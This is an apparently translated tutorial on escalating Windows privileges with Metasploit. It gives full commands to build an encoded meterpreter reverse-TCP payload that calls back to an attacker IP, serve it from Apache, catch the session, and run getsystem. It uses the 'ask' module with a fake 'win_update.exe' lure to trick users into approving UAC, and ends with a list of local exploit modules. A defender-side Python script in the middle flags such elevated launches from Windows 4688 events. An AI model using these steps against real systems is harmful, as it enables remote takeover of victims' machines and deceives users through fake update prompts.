Bypassing UAC to escalate privileges is fairly simple; this is a record of the steps.
1. Generate the executable remote-control payload

```bash
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o /opt/qq.exe
```

`-b` bytes to avoid in the output, `-e` encoder, `-i` number of encoding iterations, `-f` output file type, `-o` output path.
2. Upload the exe to the target machine: start the Apache service and copy the file into the web root

```bash
service apache2 start
cp /opt/qq.exe /var/www/html
```
3. The target machine browses to the server and downloads the file.
4. In msfconsole, start the handler

```text
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip        # the attacker IP (192.168.2.128 in step 1)
exploit
```
5. Run the exe on the target; a session comes back. Enter it and try to escalate:

```text
sessions -i 1
load priv
getsystem
```
6. If getsystem fails

```text
use exploit/windows/local/ask    # enter the privilege-escalation module
set lhost ip
set filename win_update.exe
set session 1
exploit
```
7. A second session is obtained

```text
sessions -i 2
load priv
getsystem
```
8. Escalation succeeded

```text
shell     # get a shell
whoami    # check the current user: it is system
```
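The `ask` module in step 6 only works because the user approves a UAC consent prompt for a binary named win_update.exe, after which the new process runs with a fully elevated token. Process-creation auditing (Windows Security event 4688) records the new process path and its "Token Elevation Type", so a defender can look for exactly that pattern. The script below is an added defender-side example, not part of the original post: it parses constructed 4688-style records and flags fully elevated launches whose image sits in a user-writable directory or carries an updater-like name. The field names follow the rendered 4688 event text and `%%1937` is Windows' value for TokenElevationTypeFull; the sample records, the path list and the name heuristic are assumptions made for illustration and should be tuned to the environment.

```python
import ntpath
import re
from dataclasses import dataclass

# Directories a standard user can write to (assumed list; extend as needed).
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(users\\[^\\]+\\(appdata|downloads|desktop|documents)|windows\\temp|temp)\\",
    re.IGNORECASE,
)
# File names that imitate update or installer tooling, the lure used in the write-up.
UPDATER_LIKE = re.compile(r"update|upgrade|patch|setup|install", re.IGNORECASE)
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
TOKEN_ELEVATION_FULL = "%%1937"   # TokenElevationTypeFull as rendered in 4688 text


@dataclass
class ProcessEvent:
    new_process: str
    token_elevation: str
    creator: str
    account: str


def parse_4688(text: str) -> ProcessEvent:
    """Parse the 'Field:<tab>Value' lines of a rendered 4688 event."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        key = key.strip()
        if sep and key not in fields:          # first 'Account Name' is the subject user
            fields[key] = value.strip()
    return ProcessEvent(
        new_process=fields.get("New Process Name", ""),
        token_elevation=fields.get("Token Elevation Type", ""),
        creator=fields.get("Creator Process Name", ""),
        account=fields.get("Account Name", ""),
    )


def assess(ev: ProcessEvent) -> list:
    """Reasons this launch looks like a consent-prompt elevation lure; empty if none."""
    reasons = []
    if ev.token_elevation != TOKEN_ELEVATION_FULL:
        return reasons                         # only fully elevated launches are of interest
    path = ev.new_process.lower()
    if USER_WRITABLE.match(path):
        reasons.append("elevated process image in a user-writable directory")
    if UPDATER_LIKE.search(ntpath.basename(path)) and not path.startswith(TRUSTED_ROOTS):
        reasons.append("updater-like name outside Windows/Program Files")
    return reasons


def triage(events) -> dict:
    """Map each flagged process path to the reasons it was flagged."""
    findings = {}
    for raw in events:
        ev = parse_4688(raw)
        reasons = assess(ev)
        if reasons:
            findings[ev.new_process] = reasons
    return findings


# Constructed sample records (not real telemetry), in the layout of the 4688 event text.
SAMPLE_EVENTS = [
    # An ordinary elevated admin tool started from System32: not flagged.
    "A new process has been created.\nSubject:\n\tAccount Name:\t\talice\n"
    "Process Information:\n\tNew Process Name:\tC:\\Windows\\System32\\mmc.exe\n"
    "\tToken Elevation Type:\t%%1937\n\tCreator Process Name:\tC:\\Windows\\explorer.exe\n",
    # A downloaded file run without elevation (%%1938 = limited token): not flagged.
    "A new process has been created.\nSubject:\n\tAccount Name:\t\talice\n"
    "Process Information:\n\tNew Process Name:\tC:\\Users\\alice\\Downloads\\qq.exe\n"
    "\tToken Elevation Type:\t%%1938\n\tCreator Process Name:\tC:\\Windows\\explorer.exe\n",
    # The lure pattern from the write-up: an 'update' binary in %TEMP% that received a
    # full token after the user accepted the consent prompt.
    "A new process has been created.\nSubject:\n\tAccount Name:\t\talice\n"
    "Process Information:\n\tNew Process Name:\tC:\\Users\\alice\\AppData\\Local\\Temp\\win_update.exe\n"
    "\tToken Elevation Type:\t%%1937\n\tCreator Process Name:\tC:\\Windows\\System32\\svchost.exe\n",
]

if __name__ == "__main__":
    for process, reasons in triage(SAMPLE_EVENTS).items():
        print(process)
        for reason in reasons:
            print("  -", reason)
```

The consent prompt itself is the control that this module depends on, so the complementary mitigation is policy: keep UAC at a level that prompts (or requires credentials) for administrators, and train users that update tools do not ask for elevation out of the blue. The heuristic above will also fire on legitimate installers run from Downloads, so in production it should feed an alert that includes the creator process and account fields for a human to triage rather than block outright.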
9. Summary: other privilege-escalation modules

```text
use exploit/windows/local/bypassuac_injection
use exploit/windows/local/ms13_053_schlamperei
use exploit/windows/local/ppr_flatten_rec
use exploit/windows/local/ms13_081_track_popup_menu
use exploit/windows/local/ms13_097_ie_registry_symlink
```